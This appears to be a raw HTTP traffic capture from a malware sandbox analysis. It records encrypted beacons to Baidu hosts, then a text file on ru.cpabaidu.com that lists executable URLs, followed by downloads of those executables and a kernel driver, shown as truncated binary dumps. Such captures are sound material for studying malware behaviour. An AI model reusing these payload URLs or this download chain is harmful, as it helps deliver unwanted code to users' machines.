Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...(..Q.b.g.[a.a.9.........y6..%.d..O.V..?..?qPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...(....S...R.H..H...&...!....8.?.T.b.../\. W.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .....Ln..o".<a...K..:.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .....Ln..o".<a...K..:.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .......;D...J.X..~....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .....L....u..)M-0....@HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......t..L?l#...J?...GHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 350
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` .......P.m]p..f!R...4H.o...i..E..|.X.:......s`B.........m..8..cX..$G5...2...u.....[#z"......uz^........%Y.vv........d.....|.u.U~.`....5|!.....<w....D/........h.......B}......[Q.p?@.....bZt........4.b.IsoM.Q....|.p j...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...........">.r0#X....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...........">.r0#X........
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8... ..3.}_.Ef=/......4..*20h......1.k.ubE....I..P........3POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z......
" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8.......=P.U..|.n...k....n....jE..........d}z.....".z}..8.POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8..z....5L)b?D\...R.| .~.n....h......{....~X(...3.L....KiPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z......." b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8...I.,[_...*..'..i(......g}..>>......a......y.]`..{.sV#R.k
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......z...9(&.e6... ......
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z......." b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8........#9.H..G...."...EvM=??F......o.B.`.....u..o)L....gy
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......8....S........o.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......... @.....$..#..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......(s..,....D..{...HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......8....S........o.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......... @.....$..#..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(....
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8.....Q.C....E..R..7yZ......c..fKM...1v..b$b....J........-.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......~q.W.|4..^..sI.tHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......~q.W.|4..^..sI.t..
GET /baidu/test.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ru.cpabaidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 31 Oct 2014 10:31:26 GMT
Accept-Ranges: bytes
ETag: "a7e154d3f5f4cf1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 06 Nov 2014 06:06:57 GMT
Content-Length: 130
hXXp://ru.cpabaidu.com/baidu/F1023_s_30803.exe F1023_s_30803.exe..http://ru.cpabaidu.com/baidu/G1023_s_70904.exe G1023_s_70904.exe....
GET /baidu/F1023_s_30803.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ru.cpabaidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 31 Oct 2014 10:21:12 GMT
Accept-Ranges: bytes
ETag: "7e31f764f4f4cf1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 06 Nov 2014 06:06:57 GMT
Content-Length: 17532120
MZ......................@...............5....j..........................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................p.......B...9............@...........................'.....=$;*..@.................................d.........&..h..........Pk...............................................................................................text....o.......p.................. ..`.rdata...*.......,...t..............@..@.data....~..........................@....ndata.......0...........................rsrc....h....&..j..................@..@.reloc.......p'.....................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>
GET /baidu/G1023_s_70904.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ru.cpabaidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 31 Oct 2014 10:26:22 GMT
Accept-Ranges: bytes
ETag: "dd0e71df5f4cf1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 06 Nov 2014 06:07:50 GMT
Content-Length: 30855896
MZ......................@...............6G).............................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................p.......B...9............@.......................... *......H:*..@.................................d.........$..I..........P................................................................................................text....o.......p.................. ..`.rdata...*.......,...t..............@..@.data....~..........................@....ndata.......0...........................rsrc....I....$..J..................@..@.reloc........*.....................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 222
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..j:...i.t..A.c. 8.U......v.6.#.....A..G...d...*\.<.8.@.H.P.X...` ...X..M(...jI.i......vZ......#...F..?P$q...y.....3......B..M.G...d..7.u.<.;..@.Nkb.. 0..=.....
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ......1CZMpu..<z.n..R.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ......1CZMpu..<z.n..R...
GET /client1/common/patch/32175066779/putips_wording.dat HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.0 200 OK
Expires: Fri, 28 Nov 2014 08:33:25 GMT
Date: Wed, 29 Oct 2014 08:33:25 GMT
Server: nginx
Content-Type: application/octet-stream
Content-Length: 452
Last-Modified: Mon, 29 Sep 2014 07:17:46 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 682497
Via: 1.0 tswt79:80 (Cdn Cache Server V2.0), 1.0 jg14:5706 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="putips_wording.dat"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
y........rbF.....m.{...P.?.(0sui_)....2(p..a.$.M..$..p.... ..R. T]....f.. .\.@.8..!.[|`...4..&.87R...D!)..5.r...i@..q.....'..'.oI.....M4....F..8.q..`...~d.G9.W.RC...n.......I./....O.,..k.].6..k.R.MF...i...8jO. ..Q..De._C..|&.L...|..8.`.^k)..q....d..."7.H.`...zI..r....i.*d]....}/...........s.N..]..x..u.......g.x.L.H.1.2..v....FP.... >..k...B..t...k..............c.0......r~...U....e.A.N...L~]H.......@r..............|.z.*-...P<A..w....g.x...aK...e[.{...
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...(..;vk.....)._U..8R.[..)24.I.u...4$U/....K
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......=.o...ly...._....
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ... .....~...U....4........V.u......X.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ............Mj...x.4`0..
GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "beb1d8b82cb8c9757d59de95e6371f01:1415221513"
Last-Modified: Wed, 05 Nov 2014 21:05:13 GMT
Date: Thu, 06 Nov 2014 06:07:35 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0..".0..!x...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA..141105210003Z..141119210003Z0.. Z0!.....S.@.k....6..c..140730092631Z0!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153956Z0!...d...=..q!_...g9..130729145216Z0!...d....Y.......o...140711083257Z0!...l.....h2<.H......120329152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228182208Z0!....b^......{d.J'...130102154110Z0!.......n........'u..140521222808Z0!......0..........I..130912181631Z0!....6e...~..T.......130131012247Z0!.....|.....t.l.o....140827175301Z0!.........bD#*u......130226223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724160733Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|...J.....120518121623Z0!...<%a.=.d.......O..120424164254Z0!...@.....
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...(......
.]....B..w.-.....$)..O..b........
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......,........}..Ys...
GET /client1/common/patch/33137149111/hipsClient.xml HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.0 200 OK
Expires: Sun, 09 Nov 2014 10:45:45 GMT
Date: Fri, 10 Oct 2014 10:45:45 GMT
Server: nginx
Content-Type: text/xml
Content-Length: 18710
Last-Modified: Fri, 10 Oct 2014 10:32:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 2316159
Via: 1.0 sxycwt26:8104 (Cdn Cache Server V2.0), 1.0 shiben13:5706 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="hipsClient.xml"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
.......k..65.Mf.?../..m.x..`.D..#........x$....x=.B...$j......y}.....R.C[4x../../1........ .q..=../7L..R..if.%.....aa.....y.c.oO...T.K.......>F..:. ..h. .>..l....vYe.X.u.C:...yQ.....6..Gr./....r. b.....W$.8.R...7....1.......$.....PYf.E..!..p...0P.-..{..|!.j....G...K...............0.........%.b.a.2*.'...~.r..!*2..I...mv..b.-..z&....v...B.q.~h.^r.....r..x.D(.3s.zI...G...........L.y.^.....|.D9[.W,....\..T.x.....[...C... ..$yKI.Q.LG..fG....".{...fP..S1...Mz).]Ln.....2v...d...seab..v.......u...`*.....#...^@..G..Sb.dL5.8nhd.l.\.y...`.w.......3.u........A....kq~.k....}-.| .......^...Z.})..Fq./.....U.)..:..8.j.q.*.e.#..-1..Je...(....{..s.`se....Q.x......n..>......o4.>.3.xRO..X.~>..C`.`.....f...o.h.),N.ad.#.-.......1.........(.S..[.....)..z....w.....G.#..(..=.]..p.E....Q....H...7........!....h?......_...1../X.....(.v......h..o..b......p.QH..-..*..M.}...c.1h..}..k.ro6\...7..4.Za.....m........>2.E...Q.....%A.b..:.....$..p.c.W....U.m...JL..f.i!.<..H.....n.)../..2.?6.B.|j.IX'.bY.?1.........}...Cc....s].h........KY.... .....2.l.#..........Vq. ........5...O;..A.Z..........7..:$..s..|...[.u...&O.kq.....U.P@.....P.......6.....MR...>0.....o#..>....c....Os.<!.a.=.O......i.n.2GR-_prM..q..@.@.........>...Bl....&.5w..P.d9..N....S...5..r....d@......(...-g,/..Z6...o}&}'.D......,...Cj..1..'...#j..[...,..*.@o.........L......w....uw/[1....~..'^....h.......O^.?...m.......\...[.?bZrl.I.X7E.......1E... .....&S.. .#.S&\g.0.49.....r.Z...~.0.K.....R,.4.d.6cG...#9.......E..._.<.@.)V0.:.........B..B.Z.-".1o.T.
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v[.o.'...aG.s.2....@....%.F..M....t..........8.@.H.P.X...` ........
GET /client1/common/patch/34282863525/BDMWrench.sys HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.0 200 OK
Expires: Sat, 22 Nov 2014 17:01:21 GMT
Date: Thu, 23 Oct 2014 17:01:21 GMT
Server: nginx
Content-Type: application/octet-stream
Content-Length: 216648
Last-Modified: Thu, 23 Oct 2014 16:47:43 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1170408
Via: 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 shiben14:8032 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BDMWrench.sys"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
MZ......................@...................................p...........!..L.!This program cannot be run in DOS mode....$.........................................................................................................................................................................................................................................................................................................................................................................................................TW^.:.^.:.^.:.W...Z.:.W...S.:.^.;...:...g.Y.:...e._.:.W...G.:.W..._.:.W..._.:.Rich^.:.........................PE..L.....HT.................E..........>........=............................... ..............................................P...P.......8............ ..H#...........?..................................@............=...............................text... 8.......8.................. ..h.rdata...l...=...l...=..............@..H.data... P.......P..................@...INIT....x........................... ....rsrc...8...........................@..B.reloc... .......!..................@..B...............................................U....d.l...3..E..E.P......u..E.QP.$....E.PV......M.3.................U............l...3...$....SV.u.W3.j...$....SP..$............V.D$@P.\$ ..@>..j._h....SSSSh.@..j.j.S.D$`.D$PS.D$DP.D$PPh.....D$HP.|$\.\$`.D$h@....\$l.\$p...>..;..D$.......S.D$.P..=..S.0S.t$(..p=..;..D$.}..\$.......D$..X8.D$..X<.D$DP.D$LPWj..t$....>..;..D$........5(>..SSj@..$....P.D$,PSSS.t$4
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ........
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 230
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...`....Z..,......".....tQ..;.v.m`..;....:..W....>:....<.1...V....`,,.8...o........G.n%}-&:....^.Hb..kPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...8..lv..LPL.}a.lD..N.?X{ VvG..m....>\..F.. .p.Ky...[kM....F.POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...8..ybV...%`...yH&6....x7.V=.:e#.v.....$$.CV,.@.sR...<3.....POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 238
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...h........p....a.8d.......^.f@.R..I..m....{.x.!^.V.........I.....vJ.c. ...{...V......7.Qq.....{..Tf...>... POST / HTTP/1.1
Connection: Keep-Ali
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......F.1.S...e.b....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......F.1.S...e.b....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .............'.76.....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` .......Qh.8|.:..&_.0x.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ..................RX.THTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........" b58974f666e28edaba3814768157053d(....
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 230
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...`..%.w.....3. F....m..vC........J.
...FI~.k..)V.)(..Z.n [.........N6.....F...{.S'.[......Usr....qPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...8..X...j.'?.Z1...R......./..z..o..sV....)..bZ...[.. .P.B<.POST / HTTP/1.1
Connection: Keep-Alive
